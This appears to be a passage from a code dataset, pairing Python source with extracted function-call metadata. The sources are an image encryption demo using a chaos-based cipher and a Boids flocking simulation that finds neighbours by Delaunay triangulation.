time\n'), ((7596, 7686), 'torch.optim.lr_scheduler.ReduceLROnPlateau', 'ReduceLROnPlateau', (['optimizer', '"""min"""'], {'patience': '(10)', 'factor': '(0.75)', 'verbose': '(True)', 'eps': '(1e-12)'}), "(optimizer, 'min', patience=10, factor=0.75, verbose=True,\n eps=1e-12)\n", (7613, 7686), False, 'from torch.optim.lr_scheduler import ReduceLROnPlateau\n'), ((8968, 8989), 'numpy.zeros', 'np.zeros', (['args.epochs'], {}), '(args.epochs)\n', (8976, 8989), True, 'import numpy as np\n'), ((15965, 16005), 'utils.MSEAverageMeter', 'MSEAverageMeter', (['(2)', '[1]', '_output_channel'], {}), '(2, [1], _output_channel)\n', (15980, 16005), False, 'from utils import load_config, MSEAverageMeter\n'), ((19286, 19303), 'numpy.array', 'np.array', (['ate_all'], {}), '(ate_all)\n', (19294, 19303), True, 'import numpy as np\n'), ((19318, 19335), 'numpy.array', 'np.array', (['rte_all'], {}), '(rte_all)\n', (19326, 19335), True, 'import numpy as np\n'), ((19964, 20142), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Run seq2seq model in train/test mode [required]. Optional configurations can be specified as --key [value..] pairs"""', 'add_help': '(True)'}), "(description=\n 'Run seq2seq model in train/test mode [required]. Optional configurations can be specified as --key [value..] pairs'\n , add_help=True)\n", (19987, 20142), False, 'import argparse\n'), ((23899, 23951), 'utils.load_config', 'load_config', (['default_config_file', 'args', 'unknown_args'], {}), '(default_config_file, args, unknown_args)\n', (23910, 23951), False, 'from utils import load_config, MSEAverageMeter\n'), ((1727, 1761), 'torch.nn.MSELoss', 'torch.nn.MSELoss', ([], {'reduction': '"""none"""'}), "(reduction='none')\n", (1743, 1761), False, 'import torch\n'), ((2050, 2078), 'torch.cumsum', 'torch.cumsum', (['targ[:, 1:]', '(1)'], {}), '(targ[:, 1:], 1)\n', (2062, 2078), False, 'import torch\n'), ((2100, 2128), 'torch.cumsum', 'torch.cumsum', (['pred[:, 1:]', '(1)'], {}), '(pred[:, 1:], 1)\n', (2112, 2128), False, 'import torch\n'), ((2391, 2407), 'torch.mean', 'torch.mean', (['loss'], {}), '(loss)\n', (2401, 2407), False, 'import torch\n'), ((4324, 4432), 'model_temporal.TCNSeqNetwork', 'TCNSeqNetwork', (['_input_channel', '_output_channel', 'args.kernel_size'], {'layer_channels': 'args.channels'}), '(_input_channel, _output_channel, args.kernel_size,\n layer_channels=args.channels, **config)\n', (4337, 4432), False, 'from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork\n'), ((6468, 6554), 'torch.utils.data.DataLoader', 'DataLoader', (['val_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'drop_last': '(True)'}), '(val_dataset, batch_size=args.batch_size, shuffle=True, drop_last\n =True)\n', (6478, 6554), False, 'from torch.utils.data import DataLoader\n'), ((7843, 7884), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""', '"""log.txt"""'], {}), "(args.out_dir, 'logs', 'log.txt')\n", (7851, 7884), True, 'from os import path as osp\n'), ((7896, 7916), 'os.path.exists', 'osp.exists', (['log_file'], {}), '(log_file)\n', (7906, 7916), True, 'from os import path as osp\n'), ((8160, 8190), 'os.path.exists', 'osp.exists', (['args.continue_from'], {}), '(args.continue_from)\n', (8170, 8190), True, 'from os import path as osp\n'), ((13126, 13187), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""', '"""checkpoint_latest.pt"""'], {}), "(args.out_dir, 'checkpoints', 'checkpoint_latest.pt')\n", (13134, 13187), True, 'from os import path as osp\n'), ((13501, 13576), 'numpy.array', 'np.array', (['[i[1] for i in dataset.index_map if i[0] == seq_id]'], {'dtype': 'np.int'}), '([i[1] for i in dataset.index_map if i[0] == seq_id], dtype=np.int)\n', (13509, 13576), True, 'import numpy as np\n'), ((13804, 13839), 'numpy.mean', 'np.mean', (['(ts[ind[1:]] - ts[ind[:-1]])'], {}), '(ts[ind[1:]] - ts[ind[:-1]])\n', (13811, 13839), True, 'import numpy as np\n'), ((13982, 14004), 'numpy.cumsum', 'np.cumsum', (['pos'], {'axis': '(0)'}), '(pos, axis=0)\n', (13991, 14004), True, 'import numpy as np\n'), ((15052, 15077), 'os.makedirs', 'os.makedirs', (['args.out_dir'], {}), '(args.out_dir)\n', (15063, 15077), False, 'import os\n'), ((15189, 15201), 'json.load', 'json.load', (['f'], {}), '(f)\n', (15198, 15201), False, 'import json\n'), ((15253, 15328), 'torch.load', 'torch.load', (['args.model_path'], {'map_location': '(lambda storage, location: storage)'}), '(args.model_path, map_location=lambda storage, location: storage)\n', (15263, 15328), False, 'import torch\n'), ((15360, 15437), 'torch.load', 'torch.load', (['args.model_path'], {'map_location': "{model_data['device']: args.device}"}), "(args.model_path, map_location={model_data['device']: args.device})\n", (15370, 15437), False, 'import torch\n'), ((16473, 16496), 'numpy.arange', 'np.arange', (['vel.shape[0]'], {}), '(vel.shape[0])\n', (16482, 16496), True, 'import numpy as np\n'), ((16518, 16553), 'numpy.mean', 'np.mean', (['((vel - preds) ** 2)'], {'axis': '(0)'}), '((vel - preds) ** 2, axis=0)\n', (16525, 16553), True, 'import numpy as np\n'), ((17079, 17130), 'metric.compute_absolute_trajectory_error', 'compute_absolute_trajectory_error', (['pos_pred', 'pos_gt'], {}), '(pos_pred, pos_gt)\n', (17112, 17130), False, 'from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error\n'), ((17464, 17505), 'numpy.linalg.norm', 'np.linalg.norm', (['(pos_pred - pos_gt)'], {'axis': '(1)'}), '(pos_pred - pos_gt, axis=1)\n', (17478, 17505), True, 'import numpy as np\n'), ((19254, 19270), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (19263, 19270), True, 'import matplotlib.pyplot as plt\n'), ((19416, 19432), 'numpy.mean', 'np.mean', (['ate_all'], {}), '(ate_all)\n', (19423, 19432), True, 'import numpy as np\n'), ((19434, 19450), 'numpy.mean', 'np.mean', (['rte_all'], {}), '(rte_all)\n', (19441, 19450), True, 'import numpy as np\n'), ((2697, 2733), 'json.dump', 'json.dump', (['values', 'f'], {'sort_keys': '(True)'}), '(values, f, sort_keys=True)\n', (2706, 2733), False, 'import json\n'), ((3083, 3131), 'transformations.RandomHoriRotateSeq', 'RandomHoriRotateSeq', (['input_format', 'output_format'], {}), '(input_format, output_format)\n', (3102, 3131), False, 'from transformations import ComposeTransform, RandomHoriRotateSeq\n'), ((6649, 6674), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (6672, 6674), False, 'import torch\n'), ((6724, 6747), 'os.path.isdir', 'osp.isdir', (['args.out_dir'], {}), '(args.out_dir)\n', (6733, 6747), True, 'from os import path as osp\n'), ((6761, 6786), 'os.makedirs', 'os.makedirs', (['args.out_dir'], {}), '(args.out_dir)\n', (6772, 6786), False, 'import os\n'), ((8313, 8325), 'json.load', 'json.load', (['f'], {}), '(f)\n', (8322, 8325), False, 'import json\n'), ((8386, 8464), 'torch.load', 'torch.load', (['args.continue_from'], {'map_location': '(lambda storage, location: storage)'}), '(args.continue_from, map_location=lambda storage, location: storage)\n', (8396, 8464), False, 'import torch\n'), ((8505, 8590), 'torch.load', 'torch.load', (['args.continue_from'], {'map_location': "{model_data['device']: args.device}"}), "(args.continue_from, map_location={model_data['device']: args.device}\n )\n", (8515, 8590), False, 'import torch\n'), ((9231, 9271), 'utils.MSEAverageMeter', 'MSEAverageMeter', (['(3)', '[2]', '_output_channel'], {}), '(3, [2], _output_channel)\n', (9246, 9271), False, 'from utils import load_config, MSEAverageMeter\n'), ((9321, 9332), 'time.time', 'time.time', ([], {}), '()\n', (9330, 9332), False, 'import time\n'), ((9955, 9966), 'time.time', 'time.time', ([], {}), '()\n', (9964, 9966), False, 'import time\n'), ((12861, 12881), 'numpy.isnan', 'np.isnan', (['train_loss'], {}), '(train_loss)\n', (12869, 12881), True, 'import numpy as np\n'), ((14231, 14256), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (14254, 14256), False, 'import torch\n'), ((14411, 14436), 'os.path.split', 'osp.split', (['args.test_path'], {}), '(args.test_path)\n', (14420, 14436), True, 'from os import path as osp\n'), ((15018, 15042), 'os.path.exists', 'osp.exists', (['args.out_dir'], {}), '(args.out_dir)\n', (15028, 15042), True, 'from os import path as osp\n'), ((16894, 16917), 'os.path.isdir', 'osp.isdir', (['args.out_dir'], {}), '(args.out_dir)\n', (16903, 16917), True, 'from os import path as osp\n'), ((17368, 17439), 'metric.compute_relative_trajectory_error', 'compute_relative_trajectory_error', (['pos_pred', 'pos_gt'], {'delta': 'pred_per_min'}), '(pos_pred, pos_gt, delta=pred_per_min)\n', (17401, 17439), False, 'from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error\n'), ((17802, 17821), 'numpy.mean', 'np.mean', (['val_losses'], {}), '(val_losses)\n', (17809, 17821), True, 'import numpy as np\n'), ((18109, 18158), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(kp, 2)', '(0, 0)'], {'rowspan': '(kp - 1)'}), '((kp, 2), (0, 0), rowspan=kp - 1)\n', (18125, 18158), True, 'import matplotlib.pyplot as plt\n'), ((18171, 18211), 'matplotlib.pyplot.plot', 'plt.plot', (['pos_pred[:, 0]', 'pos_pred[:, 1]'], {}), '(pos_pred[:, 0], pos_pred[:, 1])\n', (18179, 18211), True, 'import matplotlib.pyplot as plt\n'), ((18224, 18260), 'matplotlib.pyplot.plot', 'plt.plot', (['pos_gt[:, 0]', 'pos_gt[:, 1]'], {}), '(pos_gt[:, 0], pos_gt[:, 1])\n', (18232, 18260), True, 'import matplotlib.pyplot as plt\n'), ((18273, 18288), 'matplotlib.pyplot.title', 'plt.title', (['data'], {}), '(data)\n', (18282, 18288), True, 'import matplotlib.pyplot as plt\n'), ((18301, 18318), 'matplotlib.pyplot.axis', 'plt.axis', (['"""equal"""'], {}), "('equal')\n", (18309, 18318), True, 'import matplotlib.pyplot as plt\n'), ((18331, 18372), 'matplotlib.pyplot.legend', 'plt.legend', (["['Predicted', 'Ground truth']"], {}), "(['Predicted', 'Ground truth'])\n", (18341, 18372), True, 'import matplotlib.pyplot as plt\n'), ((18385, 18423), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(kp, 2)', '(kp - 1, 0)'], {}), '((kp, 2), (kp - 1, 0))\n', (18401, 18423), True, 'import matplotlib.pyplot as plt\n'), ((18436, 18459), 'matplotlib.pyplot.plot', 'plt.plot', (['pos_cum_error'], {}), '(pos_cum_error)\n', (18444, 18459), True, 'import matplotlib.pyplot as plt\n'), ((18864, 18882), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (18880, 18882), True, 'import matplotlib.pyplot as plt\n'), ((19860, 19881), 'os.path.abspath', 'osp.abspath', (['__file__'], {}), '(__file__)\n', (19871, 19881), True, 'from os import path as osp\n'), ((950, 971), 'os.path.abspath', 'os.path.abspath', (['path'], {}), '(path)\n', (965, 971), False, 'import os\n'), ((2483, 2520), 'os.path.join', 'osp.join', (['args.out_dir', '"""config.json"""'], {}), "(args.out_dir, 'config.json')\n", (2491, 2520), True, 'from os import path as osp\n'), ((6812, 6849), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""'], {}), "(args.out_dir, 'checkpoints')\n", (6820, 6849), True, 'from os import path as osp\n'), ((6876, 6913), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""'], {}), "(args.out_dir, 'checkpoints')\n", (6884, 6913), True, 'from os import path as osp\n'), ((6940, 6970), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""'], {}), "(args.out_dir, 'logs')\n", (6948, 6970), True, 'from os import path as osp\n'), ((6997, 7027), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""'], {}), "(args.out_dir, 'logs')\n", (7005, 7027), True, 'from os import path as osp\n'), ((7977, 7996), 'os.remove', 'os.remove', (['log_file'], {}), '(log_file)\n', (7986, 7996), False, 'import os\n'), ((10611, 10651), 'utils.MSEAverageMeter', 'MSEAverageMeter', (['(3)', '[2]', '_output_channel'], {}), '(3, [2], _output_channel)\n', (10626, 10651), False, 'from utils import load_config, MSEAverageMeter\n'), ((12324, 12390), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""', "('icheckpoint_%d.pt' % epoch)"], {}), "(args.out_dir, 'checkpoints', 'icheckpoint_%d.pt' % epoch)\n", (12332, 12390), True, 'from os import path as osp\n'), ((14466, 14491), 'os.path.split', 'osp.split', (['args.test_path'], {}), '(args.test_path)\n', (14475, 14491), True, 'from os import path as osp\n'), ((16222, 16259), 'os.path.split', 'osp.split', (['seq_dataset.data_path[idx]'], {}), '(seq_dataset.data_path[idx])\n', (16231, 16259), True, 'from os import path as osp\n'), ((16329, 16347), 'torch.Tensor', 'torch.Tensor', (['feat'], {}), '(feat)\n', (16341, 16347), False, 'import torch\n'), ((17020, 17062), 'numpy.concatenate', 'np.concatenate', (['[pos_pred, pos_gt]'], {'axis': '(1)'}), '([pos_pred, pos_gt], axis=1)\n', (17034, 17062), True, 'import numpy as np\n'), ((17247, 17332), 'metric.compute_relative_trajectory_error', 'compute_relative_trajectory_error', (['pos_pred', 'pos_gt'], {'delta': '(pos_pred.shape[0] - 1)'}), '(pos_pred, pos_gt, delta=pos_pred.shape[0] - 1\n )\n', (17280, 17332), False, 'from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error\n'), ((17656, 17675), 'numpy.mean', 'np.mean', (['val_losses'], {}), '(val_losses)\n', (17663, 17675), True, 'import numpy as np\n'), ((18592, 18625), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(kp, 2)', '(i, 1)'], {}), '((kp, 2), (i, 1))\n', (18608, 18625), True, 'import matplotlib.pyplot as plt\n'), ((18642, 18668), 'matplotlib.pyplot.plot', 'plt.plot', (['ind', 'preds[:, i]'], {}), '(ind, preds[:, i])\n', (18650, 18668), True, 'import matplotlib.pyplot as plt\n'), ((18685, 18709), 'matplotlib.pyplot.plot', 'plt.plot', (['ind', 'vel[:, i]'], {}), '(ind, vel[:, i])\n', (18693, 18709), True, 'import matplotlib.pyplot as plt\n'), ((18726, 18767), 'matplotlib.pyplot.legend', 'plt.legend', (["['Predicted', 'Ground truth']"], {}), "(['Predicted', 'Ground truth'])\n", (18736, 18767), True, 'import matplotlib.pyplot as plt\n'), ((18931, 18941), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (18939, 18941), True, 'import matplotlib.pyplot as plt\n'), ((18987, 19010), 'os.path.isdir', 'osp.isdir', (['args.out_dir'], {}), '(args.out_dir)\n', (18996, 19010), True, 'from os import path as osp\n'), ((4640, 4786), 'model_temporal.BilinearLSTMSeqNetwork', 'BilinearLSTMSeqNetwork', (['_input_channel', '_output_channel', 'args.batch_size', 'device'], {'lstm_layers': 'args.layers', 'lstm_size': 'args.layer_size'}), '(_input_channel, _output_channel, args.batch_size,\n device, lstm_layers=args.layers, lstm_size=args.layer_size, **config)\n', (4662, 4786), False, 'from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork\n'), ((4900, 5038), 'model_temporal.LSTMSeqNetwork', 'LSTMSeqNetwork', (['_input_channel', '_output_channel', 'args.batch_size', 'device'], {'lstm_layers': 'args.layers', 'lstm_size': 'args.layer_size'}), '(_input_channel, _output_channel, args.batch_size, device,\n lstm_layers=args.layers, lstm_size=args.layer_size, **config)\n', (4914, 5038), False, 'from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork\n'), ((8050, 8095), 'os.path.join', 'osp.join', (['args.out_dir', '"""logs"""', '"""log_old.txt"""'], {}), "(args.out_dir, 'logs', 'log_old.txt')\n", (8058, 8095), True, 'from os import path as osp\n'), ((14588, 14613), 'os.path.split', 'osp.split', (['args.test_list'], {}), '(args.test_list)\n', (14597, 14613), True, 'from os import path as osp\n'), ((11700, 11765), 'os.path.join', 'osp.join', (['args.out_dir', '"""checkpoints"""', "('checkpoint_%d.pt' % epoch)"], {}), "(args.out_dir, 'checkpoints', 'checkpoint_%d.pt' % epoch)\n", (11708, 11765), True, 'from os import path as osp\n'), ((15106, 15127), 'pathlib.Path', 'Path', (['args.model_path'], {}), '(args.model_path)\n', (15110, 15127), False, 'from pathlib import Path\n'), ((8223, 8247), 'pathlib.Path', 'Path', (['args.continue_from'], {}), '(args.continue_from)\n', (8227, 8247), False, 'from pathlib import Path\n'), ((15751, 15776), 'os.path.split', 'osp.split', (['args.test_list'], {}), '(args.test_list)\n', (15760, 15776), True, 'from os import path as osp\n')]
|
from scipy.misc import imread,imshow
import chaosencrypt as cenc
import numpy as np
from chaosencrypt.discrete_pisarchik import bitexpand,bitreduce
# Read image
print('Loading image...')
im_org = imread('../image.jpg')
# Downsample
im = im_org[::3,::3,:].copy()
# Key
key = {'a':3.8,'n':10,'r':3,'bits':32}
# Encrypt
print('Encrypting image (discrete pisarchik)...')
enc_im = cenc.encrypt(im,key,'discrete_pisarchik')
# Decrypt
print('Decrypting image (discrete pisarchik)...')
dec_im = cenc.decrypt(enc_im,key,'discrete_pisarchik')
# Diff
diff = np.array(np.abs((im*1.0) - (dec_im*1.0)), dtype='int')
maxdiff = np.max(diff)
print('Max diff:', maxdiff)
# Show
if maxdiff == 0:
diff_im = np.zeros(im.shape, dtype='uint8')
else:
diff_im = np.array((diff - np.min(diff)) / (np.max(diff) - np.min(diff))*255.99, dtype='uint8')
print('[ original | encrypted ]')
print('[ decrypted | abs(org-dec) ]')
imshow(np.concatenate(
[np.concatenate((im,bitreduce(enc_im)),1),
np.concatenate((dec_im,diff_im),1)]
,0))
|
[
"numpy.abs",
"chaosencrypt.encrypt",
"chaosencrypt.discrete_pisarchik.bitreduce",
"numpy.max",
"scipy.misc.imread",
"numpy.zeros",
"numpy.concatenate",
"numpy.min",
"chaosencrypt.decrypt"
] |
[((198, 220), 'scipy.misc.imread', 'imread', (['"""../image.jpg"""'], {}), "('../image.jpg')\n", (204, 220), False, 'from scipy.misc import imread, imshow\n'), ((381, 424), 'chaosencrypt.encrypt', 'cenc.encrypt', (['im', 'key', '"""discrete_pisarchik"""'], {}), "(im, key, 'discrete_pisarchik')\n", (393, 424), True, 'import chaosencrypt as cenc\n'), ((493, 540), 'chaosencrypt.decrypt', 'cenc.decrypt', (['enc_im', 'key', '"""discrete_pisarchik"""'], {}), "(enc_im, key, 'discrete_pisarchik')\n", (505, 540), True, 'import chaosencrypt as cenc\n'), ((619, 631), 'numpy.max', 'np.max', (['diff'], {}), '(diff)\n', (625, 631), True, 'import numpy as np\n'), ((563, 594), 'numpy.abs', 'np.abs', (['(im * 1.0 - dec_im * 1.0)'], {}), '(im * 1.0 - dec_im * 1.0)\n', (569, 594), True, 'import numpy as np\n'), ((696, 729), 'numpy.zeros', 'np.zeros', (['im.shape'], {'dtype': '"""uint8"""'}), "(im.shape, dtype='uint8')\n", (704, 729), True, 'import numpy as np\n'), ((979, 1015), 'numpy.concatenate', 'np.concatenate', (['(dec_im, diff_im)', '(1)'], {}), '((dec_im, diff_im), 1)\n', (993, 1015), True, 'import numpy as np\n'), ((764, 776), 'numpy.min', 'np.min', (['diff'], {}), '(diff)\n', (770, 776), True, 'import numpy as np\n'), ((781, 793), 'numpy.max', 'np.max', (['diff'], {}), '(diff)\n', (787, 793), True, 'import numpy as np\n'), ((796, 808), 'numpy.min', 'np.min', (['diff'], {}), '(diff)\n', (802, 808), True, 'import numpy as np\n'), ((954, 971), 'chaosencrypt.discrete_pisarchik.bitreduce', 'bitreduce', (['enc_im'], {}), '(enc_im)\n', (963, 971), False, 'from chaosencrypt.discrete_pisarchik import bitexpand, bitreduce\n')]
|
"""
This script contains the code implementing my version of the Boids artificial
life programme.
"""
# ---------------------------------- Imports ----------------------------------
# Allow imports from parent folder
import sys, os
sys.path.insert(0, os.path.abspath('..'))
# Standard library imports
import timeit
import time
import numpy as np
from math import atan2, sqrt
# Repo module imports
import boids_core.generate_values as generate_values
# Code from delauney triangulation module
from delauney_triangulation.triangulation_core.triangulation import triangulate
from delauney_triangulation.triangulation_core.linear_algebra import (vector_add,
vector_sub,
list_divide,
perpendicular,
normalise)
# ----------------------------- Class definitions -----------------------------
class World():
"""
A 2D world for the Boids to live in.
"""
def __init__(self, world_size):
self.x_min = world_size[0]
self.x_max = world_size[1]
self.y_min = world_size[2]
self.y_max = world_size[3]
class Object():
def __init__(self, idx, position, stationary=False):
self.index = idx
self.stationary = stationary
self.pos = position
class Obstacle(Object):
def __init__(self, idx, position):
super().__init__(idx, position, stationary=True)
class Boid(Object):
"""
Class to represent a single Boid.
"""
def __init__(self, idx, position, velocity, options):
super().__init__(idx, position)
self.vel = velocity
self.neighbours = []
self.max_speed = options['max_speed']
self.field_of_view = options['field_of_view']
self.vision_distance = options['vision_distance']
self.safety_zone = options['safety_zone']
self.alignment_perception = options['alignment_perception']
self.cohesion_perception = options['cohesion_perception']
self.separation_perception = options['seperation_perception']
def __repr__(self):
return f"{self.index}, {self.pos}, {self.vel}"
def magnitude(self):
return sqrt(self.vel[0]**2 + self.vel[1]**2)
def direction(self):
return atan2(self.vel[1], self.vel[0])
def make_tri(self, height, width):
"""
Generate the co-ordinates of the three points of a triangle used to
plot the boid.
Parameters
----------
height : int
The height of the boid in pixels.
width : int
The width of the boid in pixels.
Returns
-------
numpy.array
Numpy array with the triangle coordiantes.
"""
offset_h = list_divide(self.vel, self.magnitude()/height)
offset_w = list_divide(self.vel, self.magnitude()/width)
offset_w = perpendicular(offset_w)
p1 = vector_add(self.pos, list_divide(offset_h, 2))
p2 = p3 = vector_sub(self.pos, list_divide(offset_h, 2))
p2 = vector_add(p2, list_divide(offset_w, 2))
p3 = vector_sub(p3, list_divide(offset_w, 2))
return (np.asarray([p1, p2, p3]).astype(int))
def restrict_fov(self, positions):
"""
Function to limit the field of view of the boid. Neighbours beyond the
self.field_of_view/2 angle are removed from the set of neighbours.
Parameters
----------
positions : list
List of all coordinates of the boids.
"""
new_neighbours = []
boid_dir = atan2(self.vel[0], self.vel[1])
for neighbour in self.neighbours:
n_pos = positions[neighbour[1]]
# Find the angle between boid direction and neighbour
angle = atan2(n_pos[0]-self.pos[0], n_pos[1]-self.pos[1])
# print(f"{boid_dir},{boid_dir - self.field_of_view/2},{angle},{boid_dir + self.field_of_view/2}")
if ((boid_dir - self.field_of_view/2) < angle and
angle < (boid_dir + self.field_of_view/2)):
diff_x = n_pos[0] - self.pos[0]
diff_y = n_pos[1] - self.pos[1]
distance = sqrt(diff_x**2 + diff_y**2)
if distance < self.vision_distance:
new_neighbours.append(neighbour)
self.neighbours = new_neighbours
def separation(self, positions):
"""
Function to implemen the boids seperation rule.
"""
resultant_x = 0
resultant_y = 0
counter = 0
for neighbour in self.neighbours:
n_pos = positions[neighbour[1]]
diff_x = n_pos[0] - self.pos[0]
diff_y = n_pos[1] - self.pos[1]
distance = sqrt(diff_x**2 + diff_y**2)
if distance < self.safety_zone:
counter += 1
resultant_x -= diff_x / distance
resultant_y -= diff_y / distance
if counter != 0:
resultant_x /= counter
resultant_y /= counter
vs_x = self.separation_perception * resultant_x
vs_y = self.separation_perception * resultant_y
# print(f"separation,{vs_x:0.4f},{vs_y:0.4f}")
return [vs_x, vs_y]
def cohesion(self, positions):
"""
Function to implemen the boids cohesion rule.
"""
num_neighbours = len(self.neighbours)
resultant_x = 0
resultant_y = 0
for neighbour in self.neighbours:
n_pos = positions[neighbour[1]]
resultant_x += n_pos[0]
resultant_y += n_pos[1]
resultant_x /= num_neighbours
resultant_y /= num_neighbours
vc_x = self.cohesion_perception * (resultant_x - self.pos[0])
vc_y = self.cohesion_perception * (resultant_y - self.pos[1])
# print(f"cohesion,{vc_x:0.4f},{vc_y:0.4f}")
return [vc_x, vc_y]
def alignment(self, velocities):
"""
Function to implemen the boids alignment rule.
"""
num_neighbours = len(self.neighbours)
resultant_vx = 0
resultant_vy = 0
for neighbour in self.neighbours:
n_velo = velocities[neighbour[1]]
resultant_vx += n_velo[0]
resultant_vy += n_velo[1]
resultant_vx /= num_neighbours
resultant_vy /= num_neighbours
va_x = self.alignment_perception * resultant_vx
va_y = self.alignment_perception * resultant_vy
# print(f"alignment,{va_x:0.4f},{va_y:0.4f}")
return [va_x, va_y]
def wrap_world(self, world):
"""
Apply period boundary conditions, so if the boid goes off the edge
of the world it reappears on the opposite edge.
"""
if self.pos[0] < 0:
self.pos[0] = world.x_max + self.pos[0]
if self.pos[0] > world.x_max:
self.pos[0] = self.pos[0] - world.x_max
if self.pos[1] < 0:
self.pos[1] = world.y_max + self.pos[1]
if self.pos[1] > world.y_max:
self.pos[1] = self.pos[1] - world.y_max
def update_boid(self, positions, velocities, world):
"""
Function to apply all the boid rules to update the position and
velocity of a boid for a single time-step.
"""
self.restrict_fov(positions)
# print(f"current pos: {self.pos[0]:0.4f}, {self.pos[1]:0.4f}")
# print(f"current vel: {self.vel[0]:0.4f}, {self.vel[1]:0.4f}")
if len(self.neighbours) >= 1:
ali = self.alignment(velocities)
coh = self.cohesion(positions)
sep = self.separation(positions)
self.vel[0] += (coh[0] + ali[0] + sep[0])
self.vel[1] += (coh[1] + ali[1] + sep[1])
# curl = perpendicular(self.vel)
# self.vel = vector_add(self.vel, list_divide(curl, 20))
if sqrt(self.vel[0]**2 + self.vel[1]**2) > self.max_speed:
new_v = normalise(self.vel, self.max_speed)
self.vel = new_v
self.pos[0] += self.vel[0]
self.pos[1] += self.vel[1]
self.wrap_world(world)
# print(f"new pos: {self.pos[0]:0.4f}, {self.pos[1]:0.4f}")
# print(f"new vel: {self.vel[0]:0.4f}, {self.vel[1]:0.4f}")
# print("-"*32)
class Boids():
"""
A Class to store the full set of Boid Class objects, along with associated
functions on all boids.
"""
def __init__(self, number, world, options):
self.num = number
self.world = world
self.members = []
self.positions = []
self.velocities = []
self.triangulation = None
self.max_speed = options['max_speed']
def add_boid(self, new_boid):
self.members.append(new_boid)
def generate_boids(self, options, distribution='random'):
"""
Setup the inital positions and velocities of the boids.
Parameters
----------
options : dict
Dictionary of setup options.
distribution : TYPE, optional
Choose how the boids are initially distributed.
The default is 'random'. 'lattice' and 'lattice_with_noise' are
alternative options.
"""
if distribution == 'random':
positions = generate_values.random(self.num, self.world)
if distribution == 'lattice':
positions = generate_values.lattice(self.num, self.world)
if distribution == 'lattice_with_noise':
positions = generate_values.noisy_lattice(self.num, self.world)
velocities = generate_values.random_velocities(self.num, self.max_speed)
for i in range(self.num):
new_boid = Boid(i, positions[i], velocities[i], options)
self.add_boid(new_boid)
def get_pos_vel(self):
positions = []
velocities = []
for boid in self.members:
positions.append(boid.pos)
velocities.append(boid.vel)
self.positions = positions
self.velocities = velocities
def sort_boids(self):
"""
Perform a lexicographic sort on the boids by position.
"""
sorted_b = sorted(self.members, key=lambda b: [b.pos[0], b.pos[1]])
self.members = sorted_b
def triangulate_boids(self):
"""
Use the delauney_triangulation module to triangulate the set of boids.
"""
self.sort_boids()
self.get_pos_vel()
self.triangulation = triangulate(self.positions)
def setup_triangulate_boids(self):
"""
Setup the triangulation with actually performing the Delauney
triangulation algorithm. This is used for the MPI implementation
(in 'run_boids_mpi_cli.py) where there is a custom MPI triangulate
function.
"""
self.sort_boids()
self.get_pos_vel()
def make_neighbourhoods(self):
"""
Make neighbourhoods using the Delanunay triangulation module.
"""
points_seen = []
for edge in self.triangulation.edges:
if edge.org not in points_seen and not edge.deactivate:
connections = edge.find_connections(self.triangulation.edges)
self.members[edge.org].neighbours = connections
def make_neighbourhoods_basic(self, max_dist=5):
"""
Make neighbourhoods using the linear seach algorithm.
"""
for member in self.members:
member.neighbours = []
for i, pos in enumerate(self.positions):
diff_x = pos[0] - member.pos[0]
diff_y = pos[1] - member.pos[1]
distance = sqrt(diff_x**2 + diff_y**2)
if 0<distance<max_dist:
# print(i, member.pos, pos)
member.neighbours.append([member.index, i])
|
[
"boids_core.generate_values.noisy_lattice",
"math.sqrt",
"delauney_triangulation.triangulation_core.triangulation.triangulate",
"numpy.asarray",
"boids_core.generate_values.random",
"boids_core.generate_values.lattice",
"math.atan2",
"delauney_triangulation.triangulation_core.linear_algebra.list_divide",
"delauney_triangulation.triangulation_core.linear_algebra.perpendicular",
"os.path.abspath",
"delauney_triangulation.triangulation_core.linear_algebra.normalise",
"boids_core.generate_values.random_velocities"
] |
[((261, 282), 'os.path.abspath', 'os.path.abspath', (['""".."""'], {}), "('..')\n", (276, 282), False, 'import sys, os\n'), ((2460, 2501), 'math.sqrt', 'sqrt', (['(self.vel[0] ** 2 + self.vel[1] ** 2)'], {}), '(self.vel[0] ** 2 + self.vel[1] ** 2)\n', (2464, 2501), False, 'from math import atan2, sqrt\n'), ((2546, 2577), 'math.atan2', 'atan2', (['self.vel[1]', 'self.vel[0]'], {}), '(self.vel[1], self.vel[0])\n', (2551, 2577), False, 'from math import atan2, sqrt\n'), ((3200, 3223), 'delauney_triangulation.triangulation_core.linear_algebra.perpendicular', 'perpendicular', (['offset_w'], {}), '(offset_w)\n', (3213, 3223), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3933, 3964), 'math.atan2', 'atan2', (['self.vel[0]', 'self.vel[1]'], {}), '(self.vel[0], self.vel[1])\n', (3938, 3964), False, 'from math import atan2, sqrt\n'), ((10256, 10315), 'boids_core.generate_values.random_velocities', 'generate_values.random_velocities', (['self.num', 'self.max_speed'], {}), '(self.num, self.max_speed)\n', (10289, 10315), True, 'import boids_core.generate_values as generate_values\n'), ((11227, 11254), 'delauney_triangulation.triangulation_core.triangulation.triangulate', 'triangulate', (['self.positions'], {}), 